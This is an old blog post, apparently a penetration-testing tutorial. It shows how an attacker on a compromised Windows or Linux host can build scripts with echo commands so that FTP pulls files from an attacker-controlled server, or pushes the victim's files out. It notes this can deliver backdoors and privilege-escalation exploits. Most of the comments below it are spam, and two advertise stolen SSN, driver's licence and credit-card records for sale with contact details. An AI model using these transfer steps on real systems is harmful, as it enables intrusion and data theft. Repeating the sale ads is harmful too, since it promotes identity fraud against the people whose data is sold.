Sunday, 28 November 2010

FTP transfers from within a non-interactive shell (Windows and Linux)

This post covers how an attacker can perform FTP file transfers from within a non-interactive shell (for both Windows and Linux target systems)

Please use this information for legitimate penetration testing purposes only.

When a system is compromised by an attacker, it is common to try to initiate a command shell so that the system can be remotely controlled; commands issued, and files uploaded/downloaded.

However, basic non-interactive shells to compromised systems can be rather tricky to use, because it is so easy to make a mistake and run an interactive program, and then loose control of your shell (and connectivity to the compromised host).

This is why I generally prefer to get an SSH or Metasploit Meterpreter session going once I have initially compromised a system. Before an attacker could do this however, they would need to upload or download files from the system, perhaps using FTP, TFTP, SSH or HTTP. Here we look specifically at FTP.

The interactive nature of the FTP console

As the FTP program provides an interactive prompt, it is not straight-forward to use it in a non-interactive shell. Once you start the FTP command, the FTP console will be stuck waiting for input it can never get.

So how can you use FTP in a non interactive shell?

In these examples our attacking system (192.168.1.64) has an FTP server running, hosting our malicious files (in this case, test.txt)

FTP in a non-interactive shell to a Windows system

For a Windows system, this is relatively easy because the Windows version of FTP supports the "-s" option.

This enables an attacker to create a script of FTP commands, and then run that script on the remote system.

The script containing the FTP commands can be put on the remote system by echoing commands to a new file on the system using the shell. This sounds complicated but is literally a question of pasting something like the following blob of commands into the shell:

echo open 192.168.1.64 21> ftp.txt
echo anonymous>> ftp.txt
echo ftp@ftp.com>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt

This script file can then be checked with the following command. Each line above has created a line in the script file on the remote system.

type ftp.txt

open 192.168.1.64 21
anonymous
ftp@ftp.com
bin

get test.txt
bye


This can then be executed on the remote system, like this:

ftp -s:ftp.txt

This works well and is quick and easy in a Windows shell, however, the task is slightly more complex on a Linux system.


FTP in a non-interactive shell to a Linux system

Normally the FTP command shell on Linux does not have the "-s" option, so we will need to build a shell script to execute the FTP commands. Something like this will work.

echo "#!/bin/sh" >> ftp3.sh
echo "HOST='192.168.1.64'" >> ftp3.sh
echo "USER='anonymous'" >> ftp3.sh
echo "PASSWD='blah@blah.com'" >> ftp3.sh
echo "FILE='test.txt'" >> ftp3.sh
echo "" >> ftp3.sh
echo "ftp -n \$HOST <<BLAH " >> ftp3.sh
echo "quote USER \$USER" >> ftp3.sh
echo "quote PASS \$PASSWD" >> ftp3.sh
echo "bin" >> ftp3.sh
echo "get \$FILE" >> ftp3.sh
echo "quit" >> ftp3.sh
echo "BLAH" >> ftp3.sh
echo "exit 0" >> ftp3.sh

When pasted into a non-interactive shell the above commands will produce a script file on the remote vicitm, "ftp3.sh".

HOST='192.168.1.64'
USER='anonymous'
PASSWD='blah@blah.com'
FILE='test.txt'

ftp -n $HOST <<BLAH
quote USER $USER
quote PASS $PASSWD
bin
get $FILE
quit
END_SCRIPT
exit 0


To check, and run this script, simply execute the following commands:

cat ftp3.sh
chmod 777 ftp3.sh
./ftp3.sh

...and this will use FTP to download our test file to the target system.


Using this technique it would be relatively easy to put additional files on the victim system, such as; connectivity tools, privilege-escalation exploits, back-doors, and also copy files from the victim system using the same method (with a put rather than a get).

Adding the "echo"s to your own scripts

So, say you have some commands you want to put onto the remote system as a script. It would be a bit of a pain to manually add all those "echo"s to each line, so here is an easy way to add the prepended "echo", and the appended ">> file.txt" to each line.

cat ftp2.sh | sed 's/^/echo "/' | sed 's/$/" >> ftp3.sh/' | sed 's/\$/\\\$/'> ftpecho.txt

(This command would be used on the attacking system, to prepare the blob of echo commands you want to paste into the non-interactive shell. It also helps protect the $ character which was used in the Linux script above for shell-script variables).

26 comments:

  1. This comment has been removed by the author.

    ReplyDelete
    Replies
    1. Hey Guys !

      USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
      All Leads have genuine & valid information

      **HEADERS IN LEADS**
      First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

      *Price for SSN lead $2
      *You can ask for sample before any deal
      *If anyone buy in bulk, we can negotiate
      *Sampling is just for serious buyers

      ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
      ->$5 PER EACH

      ->Hope for the long term deal
      ->Interested buyers will be welcome

      **Contact 24/7**
      Whatsapp > +923172721122
      Email > leads.sellers1212@gmail.com
      Telegram > @leadsupplier
      ICQ > 752822040

      Delete
  2. Thanks for taking time to share this post. It is really useful. Continue sharing more like this.
    Regards,
    Python Training in Chennai

    ReplyDelete
  3. Networking Cable Manufacturers and Suppliers

    Mandeep Cables are a leading wire and cable manufacturers company. That is engaged in manufacturers and suppliers of a wide range of networking cable. That are manufacturer from a high grade of raw materials and using modern technology. Call Us-91 9560718414.


    ReplyDelete
  4. I am reading your post from the beginning, it was so interesting to read & I feel thanks to you for posting such a good blog, keep updates regularly.

    Php Training in Chennai | Robotics Training in Chennai.

    ReplyDelete
  5. I am reading your post from the beginning, it was so interesting to read & I feel thanks to you for posting such a good blog, keep updates regularly.
    Regards,
    best embedded systems training institutes in chennai | embedded systems course fees in chennai .

    ReplyDelete
  6. Whoa! I’m enjoying the template/theme of this website. It’s simple, yet effective. A lot of times it’s very hard to get that “perfect balance” between superb usability and visual appeal. I must say you’ve done a very good job with this.
    health and safety courses in chennai

    ReplyDelete
  7. This comment has been removed by the author.

    ReplyDelete
  8. Interesting blog, it gives lots of information to me. Thanks for sharing such a nice blog.

    Guest posting sites
    Education

    ReplyDelete
  9. your blog information's are really creative and It contains full of new innovative ideas.
    thank you for sharing with us.please update more data.
    android course in bangalore with placement
    Android courses in Anna Nagar
    Android Certification Training in T nagar
    Android Training in Sholinganallur

    ReplyDelete
  10. more about the blog is good but if you was seen any other blog the content should be failed to fulfill the users requests on that field,but in this blog the content will fulfill the users who related to search this field.... great work
    Ai & Artificial Intelligence Course in Chennai
    PHP Training in Chennai
    Ethical Hacking Course in Chennai Blue Prism Training in Chennai
    UiPath Training in Chennai

    ReplyDelete
  11. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  12. This post is so interactive and informative.keep update more information...
    German Classes in Tambaram
    German Classes in chennai

    ReplyDelete